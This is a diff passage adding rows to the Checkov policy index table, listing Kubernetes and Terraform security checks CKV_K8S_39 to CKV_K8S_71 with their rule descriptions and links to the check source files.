+| 3079 | CKV_K8S_39               | resource                         | CronJob                                                                                          | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Kubernetes              | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py)                                                                        |
+| 3080 | CKV_K8S_39               | resource                         | DaemonSet                                                                                        | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Kubernetes              | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py)                                                                        |
+| 3081 | CKV_K8S_39               | resource                         | Deployment                                                                                       | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Kubernetes              | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py)                                                                        |
+| 3082 | CKV_K8S_39               | resource                         | DeploymentConfig                                                                                 | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Kubernetes              | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py)                                                                        |
+| 3083 | CKV_K8S_39               | resource                         | Job                                                                                              | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Kubernetes              | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py)                                                                        |
+| 3084 | CKV_K8S_39               | resource                         | Pod                                                                                              | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Kubernetes              | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py)                                                                        |
+| 3085 | CKV_K8S_39               | resource                         | PodTemplate                                                                                      | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Kubernetes              | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py)                                                                        |
+| 3086 | CKV_K8S_39               | resource                         | ReplicaSet                                                                                       | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Kubernetes              | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py)                                                                        |
+| 3087 | CKV_K8S_39               | resource                         | ReplicationController                                                                            | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Kubernetes              | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py)                                                                        |
+| 3088 | CKV_K8S_39               | resource                         | StatefulSet                                                                                      | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Kubernetes              | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py)                                                                        |
+| 3089 | CKV_K8S_39               | resource                         | kubernetes_deployment                                                                            | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Terraform               | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py)                                                                  |
+| 3090 | CKV_K8S_39               | resource                         | kubernetes_deployment_v1                                                                         | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Terraform               | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py)                                                                  |
+| 3091 | CKV_K8S_39               | resource                         | kubernetes_pod                                                                                   | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Terraform               | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py)                                                                  |
+| 3092 | CKV_K8S_39               | resource                         | kubernetes_pod_v1                                                                                | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Terraform               | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py)                                                                  |
+| 3093 | CKV_K8S_40               | resource                         | CronJob                                                                                          | Containers should run as a high UID to avoid host conflict                                                                                                                                               | Kubernetes              | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py)                                                                                    |
+| 3094 | CKV_K8S_40               | resource                         | DaemonSet                                                                                        | Containers should run as a high UID to avoid host conflict                                                                                                                                               | Kubernetes              | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py)                                                                                    |
+| 3095 | CKV_K8S_40               | resource                         | Deployment                                                                                       | Containers should run as a high UID to avoid host conflict                                                                                                                                               | Kubernetes              | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py)                                                                                    |
+| 3096 | CKV_K8S_40               | resource                         | Job                                                                                              | Containers should run as a high UID to avoid host conflict                                                                                                                                               | Kubernetes              | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py)                                                                                    |
+| 3097 | CKV_K8S_40               | resource                         | Pod                                                                                              | Containers should run as a high UID to avoid host conflict                                                                                                                                               | Kubernetes              | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py)                                                                                    |
+| 3098 | CKV_K8S_40               | resource                         | ReplicaSet                                                                                       | Containers should run as a high UID to avoid host conflict                                                                                                                                               | Kubernetes              | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py)                                                                                    |
+| 3099 | CKV_K8S_40               | resource                         | ReplicationController                                                                            | Containers should run as a high UID to avoid host conflict                                                                                                                                               | Kubernetes              | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py)                                                                                    |
+| 3100 | CKV_K8S_40               | resource                         | StatefulSet                                                                                      | Containers should run as a high UID to avoid host conflict                                                                                                                                               | Kubernetes              | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py)                                                                                    |
+| 3101 | CKV_K8S_41               | resource                         | ServiceAccount                                                                                   | Ensure that default service accounts are not actively used                                                                                                                                               | Kubernetes              | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccount.py)                                                                                    |
+| 3102 | CKV_K8S_41               | resource                         | kubernetes_service_account                                                                       | Ensure that default service accounts are not actively used                                                                                                                                               | Terraform               | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py)                                                                              |
+| 3103 | CKV_K8S_41               | resource                         | kubernetes_service_account_v1                                                                    | Ensure that default service accounts are not actively used                                                                                                                                               | Terraform               | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py)                                                                              |
+| 3104 | CKV_K8S_42               | resource                         | ClusterRoleBinding                                                                               | Ensure that default service accounts are not actively used                                                                                                                                               | Kubernetes              | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccountBinding.py)                                                                      |
+| 3105 | CKV_K8S_42               | resource                         | RoleBinding                                                                                      | Ensure that default service accounts are not actively used                                                                                                                                               | Kubernetes              | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccountBinding.py)                                                                      |
+| 3106 | CKV_K8S_42               | resource                         | kubernetes_cluster_role_binding                                                                  | Ensure that default service accounts are not actively used                                                                                                                                               | Terraform               | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py)                                                                |
+| 3107 | CKV_K8S_42               | resource                         | kubernetes_cluster_role_binding_v1                                                               | Ensure that default service accounts are not actively used                                                                                                                                               | Terraform               | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py)                                                                |
+| 3108 | CKV_K8S_42               | resource                         | kubernetes_role_binding                                                                          | Ensure that default service accounts are not actively used                                                                                                                                               | Terraform               | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py)                                                                |
+| 3109 | CKV_K8S_42               | resource                         | kubernetes_role_binding_v1                                                                       | Ensure that default service accounts are not actively used                                                                                                                                               | Terraform               | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py)                                                                |
+| 3110 | CKV_K8S_43               | resource                         | CronJob                                                                                          | Image should use digest                                                                                                                                                                                  | Kubernetes              | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py)                                                                                                        |
+| 3111 | CKV_K8S_43               | resource                         | DaemonSet                                                                                        | Image should use digest                                                                                                                                                                                  | Kubernetes              | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py)                                                                                                        |
+| 3112 | CKV_K8S_43               | resource                         | Deployment                                                                                       | Image should use digest                                                                                                                                                                                  | Kubernetes              | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py)                                                                                                        |
+| 3113 | CKV_K8S_43               | resource                         | DeploymentConfig                                                                                 | Image should use digest                                                                                                                                                                                  | Kubernetes              | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py)                                                                                                        |
+| 3114 | CKV_K8S_43               | resource                         | Job                                                                                              | Image should use digest                                                                                                                                                                                  | Kubernetes              | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py)                                                                                                        |
+| 3115 | CKV_K8S_43               | resource                         | Pod                                                                                              | Image should use digest                                                                                                                                                                                  | Kubernetes              | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py)                                                                                                        |
+| 3116 | CKV_K8S_43               | resource                         | PodTemplate                                                                                      | Image should use digest                                                                                                                                                                                  | Kubernetes              | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py)                                                                                                        |
+| 3117 | CKV_K8S_43               | resource                         | ReplicaSet                                                                                       | Image should use digest                                                                                                                                                                                  | Kubernetes              | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py)                                                                                                        |
+| 3118 | CKV_K8S_43               | resource                         | ReplicationController                                                                            | Image should use digest                                                                                                                                                                                  | Kubernetes              | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py)                                                                                                        |
+| 3119 | CKV_K8S_43               | resource                         | StatefulSet                                                                                      | Image should use digest                                                                                                                                                                                  | Kubernetes              | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py)                                                                                                        |
+| 3120 | CKV_K8S_43               | resource                         | kubernetes_deployment                                                                            | Image should use digest                                                                                                                                                                                  | Terraform               | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py)                                                                                                  |
+| 3121 | CKV_K8S_43               | resource                         | kubernetes_deployment_v1                                                                         | Image should use digest                                                                                                                                                                                  | Terraform               | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py)                                                                                                  |
+| 3122 | CKV_K8S_43               | resource                         | kubernetes_pod                                                                                   | Image should use digest                                                                                                                                                                                  | Terraform               | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py)                                                                                                  |
+| 3123 | CKV_K8S_43               | resource                         | kubernetes_pod_v1                                                                                | Image should use digest                                                                                                                                                                                  | Terraform               | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py)                                                                                                  |
+| 3124 | CKV_K8S_44               | resource                         | Service                                                                                          | Ensure that the Tiller Service (Helm v2) is deleted                                                                                                                                                      | Kubernetes              | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerService.py)                                                                                                    |
+| 3125 | CKV_K8S_44               | resource                         | kubernetes_service                                                                               | Ensure that the Tiller Service (Helm v2) is deleted                                                                                                                                                      | Terraform               | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py)                                                                                              |
+| 3126 | CKV_K8S_44               | resource                         | kubernetes_service_v1                                                                            | Ensure that the Tiller Service (Helm v2) is deleted                                                                                                                                                      | Terraform               | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py)                                                                                              |
+| 3127 | CKV_K8S_45               | resource                         | CronJob                                                                                          | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster                                                                                                                         | Kubernetes              | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py)                                                                              |
+| 3128 | CKV_K8S_45               | resource                         | DaemonSet                                                                                        | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster                                                                                                                         | Kubernetes              | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py)                                                                              |
+| 3129 | CKV_K8S_45               | resource                         | Deployment                                                                                       | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster                                                                                                                         | Kubernetes              | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py)                                                                              |
+| 3130 | CKV_K8S_45               | resource                         | DeploymentConfig                                                                                 | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster                                                                                                                         | Kubernetes              | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py)                                                                              |
+| 3131 | CKV_K8S_45               | resource                         | Job                                                                                              | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster                                                                                                                         | Kubernetes              | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py)                                                                              |
+| 3132 | CKV_K8S_45               | resource                         | Pod                                                                                              | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster                                                                                                                         | Kubernetes              | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py)                                                                              |
+| 3133 | CKV_K8S_45               | resource                         | PodTemplate                                                                                      | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster                                                                                                                         | Kubernetes              | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py)                                                                              |
+| 3134 | CKV_K8S_45               | resource                         | ReplicaSet                                                                                       | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster                                                                                                                         | Kubernetes              | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py)                                                                              |
+| 3135 | CKV_K8S_45               | resource                         | ReplicationController                                                                            | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster                                                                                                                         | Kubernetes              | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py)                                                                              |
+| 3136 | CKV_K8S_45               | resource                         | StatefulSet                                                                                      | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster                                                                                                                         | Kubernetes              | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py)                                                                              |
+| 3137 | CKV_K8S_49               | resource                         | ClusterRole                                                                                      | Minimize wildcard use in Roles and ClusterRoles                                                                                                                                                          | Kubernetes              | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/WildcardRoles.py)                                                                                                    |
+| 3138 | CKV_K8S_49               | resource                         | Role                                                                                             | Minimize wildcard use in Roles and ClusterRoles                                                                                                                                                          | Kubernetes              | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/WildcardRoles.py)                                                                                                    |
+| 3139 | CKV_K8S_49               | resource                         | kubernetes_cluster_role                                                                          | Minimize wildcard use in Roles and ClusterRoles                                                                                                                                                          | Terraform               | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py)                                                                                              |
+| 3140 | CKV_K8S_49               | resource                         | kubernetes_cluster_role_v1                                                                       | Minimize wildcard use in Roles and ClusterRoles                                                                                                                                                          | Terraform               | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py)                                                                                              |
+| 3141 | CKV_K8S_49               | resource                         | kubernetes_role                                                                                  | Minimize wildcard use in Roles and ClusterRoles                                                                                                                                                          | Terraform               | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py)                                                                                              |
+| 3142 | CKV_K8S_49               | resource                         | kubernetes_role_v1                                                                               | Minimize wildcard use in Roles and ClusterRoles                                                                                                                                                          | Terraform               | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py)                                                                                              |
+| 3143 | CKV_K8S_68               | resource                         | CronJob                                                                                          | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py)                                                                                  |
+| 3144 | CKV_K8S_68               | resource                         | DaemonSet                                                                                        | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py)                                                                                  |
+| 3145 | CKV_K8S_68               | resource                         | Deployment                                                                                       | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py)                                                                                  |
+| 3146 | CKV_K8S_68               | resource                         | DeploymentConfig                                                                                 | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py)                                                                                  |
+| 3147 | CKV_K8S_68               | resource                         | Job                                                                                              | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py)                                                                                  |
+| 3148 | CKV_K8S_68               | resource                         | Pod                                                                                              | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py)                                                                                  |
+| 3149 | CKV_K8S_68               | resource                         | PodTemplate                                                                                      | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py)                                                                                  |
+| 3150 | CKV_K8S_68               | resource                         | ReplicaSet                                                                                       | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py)                                                                                  |
+| 3151 | CKV_K8S_68               | resource                         | ReplicationController                                                                            | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py)                                                                                  |
+| 3152 | CKV_K8S_68               | resource                         | StatefulSet                                                                                      | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py)                                                                                  |
+| 3153 | CKV_K8S_69               | resource                         | CronJob                                                                                          | Ensure that the --basic-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py)                                                                                  |
+| 3154 | CKV_K8S_69               | resource                         | DaemonSet                                                                                        | Ensure that the --basic-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py)                                                                                  |
+| 3155 | CKV_K8S_69               | resource                         | Deployment                                                                                       | Ensure that the --basic-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py)                                                                                  |
+| 3156 | CKV_K8S_69               | resource                         | DeploymentConfig                                                                                 | Ensure that the --basic-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py)                                                                                  |
+| 3157 | CKV_K8S_69               | resource                         | Job                                                                                              | Ensure that the --basic-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py)                                                                                  |
+| 3158 | CKV_K8S_69               | resource                         | Pod                                                                                              | Ensure that the --basic-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py)                                                                                  |
+| 3159 | CKV_K8S_69               | resource                         | PodTemplate                                                                                      | Ensure that the --basic-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py)                                                                                  |
+| 3160 | CKV_K8S_69               | resource                         | ReplicaSet                                                                                       | Ensure that the --basic-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py)                                                                                  |
+| 3161 | CKV_K8S_69               | resource                         | ReplicationController                                                                            | Ensure that the --basic-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py)                                                                                  |
+| 3162 | CKV_K8S_69               | resource                         | StatefulSet                                                                                      | Ensure that the --basic-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py)                                                                                  |
+| 3163 | CKV_K8S_70               | resource                         | CronJob                                                                                          | Ensure that the --token-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py)                                                                                  |
+| 3164 | CKV_K8S_70               | resource                         | DaemonSet                                                                                        | Ensure that the --token-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py)                                                                                  |
+| 3165 | CKV_K8S_70               | resource                         | Deployment                                                                                       | Ensure that the --token-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py)                                                                                  |
+| 3166 | CKV_K8S_70               | resource                         | DeploymentConfig                                                                                 | Ensure that the --token-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py)                                                                                  |
+| 3167 | CKV_K8S_70               | resource                         | Job                                                                                              | Ensure that the --token-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py)                                                                                  |
+| 3168 | CKV_K8S_70               | resource                         | Pod                                                                                              | Ensure that the --token-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py)                                                                                  |
+| 3169 | CKV_K8S_70               | resource                         | PodTemplate                                                                                      | Ensure that the --token-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py)                                                                                  |
+| 3170 | CKV_K8S_70               | resource                         | ReplicaSet                                                                                       | Ensure that the --token-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py)                                                                                  |
+| 3171 | CKV_K8S_70               | resource                         | ReplicationController                                                                            | Ensure that the --token-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py)                                                                                  |
+| 3172 | CKV_K8S_70               | resource                         | StatefulSet                                                                                      | Ensure that the --token-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py)                                                                                  |
+| 3173 | CKV_K8S_71               | resource                         | CronJob                                                                                          | Ensure that the --kubelet-https argument is set to true                                                                                                                                                  | Kubernetes              | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py)                                                                                    |
+| 3174 | CKV_K8S_71               | resource                         | DaemonSet                                                                                        | Ensure that the --kubelet-https argument is set to true                                                                                                                                                  | Kubernetes              | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py)                                                                                    |
+| 3175 | CKV_K8S_71               | resource                         | Deployment                                                                                       | Ensure that the --kubelet-https argument is set to true                                                                                                                                                  | Kubernetes              | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py)                                                                                    |
